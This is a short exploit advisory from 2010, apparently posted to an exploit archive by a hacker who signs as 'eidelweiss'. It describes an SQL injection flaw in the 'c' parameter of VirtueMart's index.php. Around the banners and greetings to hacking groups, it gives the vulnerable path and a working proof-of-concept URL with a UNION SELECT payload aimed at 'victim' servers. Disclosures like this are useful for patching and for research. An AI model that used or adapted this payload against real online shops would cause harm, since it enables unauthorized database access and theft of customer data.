VirtueMart (index.php) SQL Injection Vulnerability
Posted on 06 March 2010
================================================== VirtueMart (index.php) SQL Injection Vulnerability ================================================== ########################################################### ### # ### VirtueMart "index.php?c=" SQL Injection Vulnerability # ### # ########################################################### ### ### * @package VirtueMart ### * @Version - ### * @Link http://virtuemart.net ### ########################################################### ### ### Type : SQL Injection Vulnerability ### Author: eidelweiss ### Date : 2010-03-07 ### Location: Indonesia ### Contact: g1xsystem [at] windowslive [dot] com or eidelweiss [at]myself[dot]com ### Special Thank`s: [D]eal [C]yber - AL-MARHUM - my mom (i miss u) ### Greetz : yogyacarderlink , exploi-db , inj3ct0r , hack0wn , str0ke & all Indonesian hacker ### ########################################################### ### ### Vuln: lang/VMdir/index.php?c= ### ### Exploit: http://victim.com/lang/VMdir/index.php?c=39&p=47 [SQL injection] ### ### P0C: http://server/English/vm_product/index.php?c=39&p=47-1+union+select+1,2,3,4,5-- ### ########################################################### ### # ### Nothing Impossible In This World {} Hacking Is Art # ### # ########################################################### # ~ - [ [ : Inj3ct0r : ] ]
